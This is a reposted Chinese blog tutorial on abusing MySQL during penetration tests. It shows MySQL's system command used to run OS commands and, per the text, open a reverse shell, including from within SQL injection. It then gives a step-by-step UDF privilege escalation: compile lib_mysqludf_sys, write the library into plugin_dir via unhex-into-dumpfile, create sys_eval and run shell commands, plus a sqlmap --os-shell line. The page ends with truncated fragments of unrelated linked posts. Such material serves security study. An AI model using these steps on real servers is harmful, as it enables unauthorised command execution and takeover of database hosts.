2. 程式人生 > >MySQL的system命令在滲透測試中的使用以及UDF提權

MySQL的system命令在滲透測試中的使用以及UDF提權

阿新 發佈:2018-01-31
style data erro 重新 pos empty linux類 directory 意思

一、MySQL中的system命令

在MySQL 5.x中增加了system命令,簡單的符號是\!,從而使MySQL可以執行系統的命令

1 mysql> system echo "12345"
2 12345

技術分享圖片

因為突發奇想,可以使用這個辦法反彈shell

技術分享圖片

結果OK:

技術分享圖片

嘗試和select拼接執行,這樣是成功的

技術分享圖片

想到這裏其實可以拼接在SQL註入語句中執行OS命令,或者能連上MySQL之後直接執行OS命令反彈shell。

二、MySQL UDF提權

這裏按照linux類操作系統舉例了,服務器端用windows真的沒意思了,雖然還有很多。https://github.com/mysqludf/lib_mysqludf_sys解壓後進入(git clone後直接進入)目錄:

1 gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so

如果遇到報錯:

1 In file included from lib_mysqludf_sys.c:40:
2 /usr/include/mysql/my_global.h:626:25: error: my_compiler.h: No such file or directory

可以做如下修改:修改/usr/include/mysql/my_global.h文件,註釋626行後重新編譯。並使用Hex.hta獲取16進制。

 1 mysql> show variables like %plugin%;
 2 +---------------+-------------------------+
 3 | Variable_name | Value                   |
 4 +---------------+-------------------------+
 5 | plugin_dir    | /usr/lib64/mysql/plugin |
 6 +---------------+-------------------------+
 7 1 row in set (0.00 sec)

 
 8 
 9 mysql> select * from func; #檢查是否已經有人導出過了
10 mysql> select unhex(hexcode) into dumpfile /usr/lib64/mysql/plugin/mysqludf.so;
11 Query OK, 1 row affected (0.01 sec)#需要有/usr/lib64/mysql/plugin/目錄的寫入權限
12 
13 mysql> create function sys_eval returns string soname mysqludf.so;
14 Query OK, 0 rows affected (0.00 sec)
15 
16 mysql> select sys_eval(whoami);
17 +--------------------+
18 | sys_eval(whoami) |
19 +--------------------+
20 | mysql
21              |
22 +--------------------+
23 1 row in set (0.03 sec)
24 
25 mysql> select * from func;
26 +----------+-----+-------------+----------+
27 | name     | ret | dl          | type     |
28 +----------+-----+-------------+----------+
29 | sys_eval |   0 | mysqludf.so | function |
30 +----------+-----+-------------+----------+
31 1 row in set (0.00 sec)
32 
33 mysql> drop function sys_eval;
34 Query OK, 0 rows affected (0.00 sec)
35 
36 mysql> select * from func;
37 Empty set (0.00 sec)

或者使用sqlmap 執行提權:

1 #sqlmap -d "mysql://root:[email protected]:3306/test" --os-shell
2 #test的地方是database name

MySQL的system命令在滲透測試中的使用以及UDF提權

相關推薦

MySQL的system命令滲透測試的使用以及UDF

style data erro 重新 pos empty linux類 directory 意思 一、MySQL中的system命令 在MySQL 5.x中增加了system命令,簡單的符號是\!,從而使MySQL可以執行系統的命令 1 mysql> system

理解DNS記錄以及滲透測試的簡單應用

前言 DNS (Domain Name System, 域名系統 ),全球資訊網上作為域名和IP地址相互對映的一個 分散式資料庫,能夠使使用者更方便的訪問網際網路,而不用去記住能夠被機器直接讀取的IP數串。通過域名,最終得到該域名對應的IP地址的過程叫做域名解析(或

Windows使用命令行給普通用戶成管理員組

windows 修改密碼 管理員 用戶 新建 在進入CMD後1. 首先查看當前用戶信息net user UserName2. 新建用戶、修改密碼新建用戶 net user add UserName修改密碼 net user UserName *3 將用戶加入到本地組net local

詳述MSSQL服務在滲透測試的利用 (下篇)

services req 正在 執行 als lock 註冊 禁用 -- part3 MSSQL寫文件步驟1 sp_makewebtask寫文件因為是`SA`權限,如果目標服務器是web服務器,我們也不用去備份了,可以直接寫個一句話木馬進去到web目錄。在不知道web目錄的

Redis 基礎梳理以及其在滲透測試的利用

0X00 前言: 之前一直說 NOSQL ,也看了不少文章對於未授權 NOSQL 的攻擊案例,知道大致怎麼用,但是自己一直沒有嘗試好好使用過,感覺對比 MYSQL 而言,我太輕視 NOSQL ,於是這次下定決心以 Redis 作為例子好好玩玩,特此記錄備忘。 0X01 簡介 我們知道

DNSLOG在滲透測試的玩法兒

首先了解一下DNS是啥???   DNS(Domain Name System,域名系統),全球資訊網上作為域名和IP地址相互對映的一個分散式資料庫,能夠使使用者更方便的訪問網際網路,而不用去記住能夠被機器直接讀取的IP數串。通過域名,最終得到該域名對應的IP地址的過程叫做域名解析(或主機名解析)。DNS協

[滲透測試] 滲透測試的上傳攻擊技巧

1.FCKeditor FCKeditor是一個專門用在網頁上的,開放原始碼的所見即所得文字編輯器,不需要太複雜的安裝步驟即可使用。它可以和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java及ABAP等程式語言相結合。 在早期版本中輸入地址

滲透測試常見的埠

1,web類(web漏洞/敏感目錄) 第三方通用元件漏洞struts thinkphp jboss ganglia zabbix 80 web 80-89 web 8000-9090 web 2,資料庫類(掃描弱口令) 1433 MSSQL 1521 Oracle 33

MySQL UDF獲取主機控制權

安裝 系統 .py 執行 dex udf 操作 接口 use UDF(User defined function)是MySQL的一個拓展接口,用來擴展MySQL的功能。在具備MySQL管理員訪問權限的條件下,可利用該特性進行提權,獲取所在主機的控制權。下面以windows主

基礎-----mysql-udf

paths 導出 table ads local sele 代碼 更新 reat 1.總結關於udf提權方法 通過弱口令,爆破,網站配置文件等方式得到mysql數據庫帳號密碼,---還要能外連 (1).將udf.dll代碼的16進制數聲明給my_udf_a變量 set @m

udf原理詳解

define n) 指定位置 sqlmap 是什麽 reat ali 為我 location 0x00-前言 這個udf提權復現搞了三天,終於搞出來了。網上的教程對於初學者不太友好,以至於我一直迷迷糊糊的,走了不少彎路。下面就來總結一下我的理解。 想要知道udf提權是怎麽回

SQLMAP UDF

create family 數據 mysql5 連接mysql pan IT ret dir SQLMAP UDF提權 1.連接mysql數據打開一個交互shell: sqlmap.py -d mysql://root:[email protected]:3306/t

Linux通過su、sudo命令實現用戶切換、

切換 ifconf OS sudoers 機制 lB AS 虛擬網卡 ges 概述大多數Linux服務器並不建議用戶直接以root用戶進行登錄。一方面可以大大減少因誤操作而導致的破壞,另一方面也降低了特權密碼在不安全的網絡中被泄露的風險。鑒於這些原因,需要為普通用戶提供一種

21. 從一道CTF靶機來學習mysql-udf

這次測試的靶機為 Raven: 2 這裡是CTF解題視訊地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶機主要學習 PHPMailer 跟 mymql 的UDF提權。 掃描網站目錄發現,還是wordpress搭建的,嘗試使用wp

SQL注入利用XP_cmdshell的用法

先來介紹一下子伺服器的基本情況,windows 2000 adv server 中文版,據稱打過了sp3,asp+iis+mssql 。首先掃描了一下子埠,呵呵,開始的一般步驟。 埠21開放: FTP (Control)埠80開放: HTTP, World Wide Web埠

udf的一次學習

udf提權。利用條件:root許可權的mysql賬號密碼。提權方法:具體語句如下:   create function cmdshell returns string soname ‘udf.dll’;   select cmdshell(’net user

udf入侵

第三步:使用SQL語句建立功能函式。語法:Create Function 函式名(函式名只能為下面列表中的其中之一) returns string soname '匯出的DLL路徑';對於MYSQL5.0以上版本,語句中的DLL不允許帶全路徑,如果你在第二步中已將DLL匯出到系統目錄,那麼你就可以省略路徑而

Mysql UDF方法

##0x01 UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫,就像呼叫本機函式一樣。 ##0x02 windows下udf提權的條件 - 如果mys

攻防對抗常用的windows命令滲透測試和應急響應)

一、滲透測試 1、資訊收集類 #檢視系統資訊 >systeminfo #檢視使用者資訊 >net user >net user xxx #檢視網路資訊 >ipconfig /all >route print >netstat -abon >

基於Ubuntu系統XAMPP環境安裝以及DVWA滲透測試系統安裝(詳解的不能再詳解了)

dmi 文件移動 unzip line 配置 isp round ads 開始     首先這是X勺年人生第二次博,用來記錄一下轉折於我而言。做個簡介,這個Ubuntu是linux的一種吧,然     然後這個Ubuntu是我剛簡單安裝(在虛擬機上)沒有經過任何配置,從頭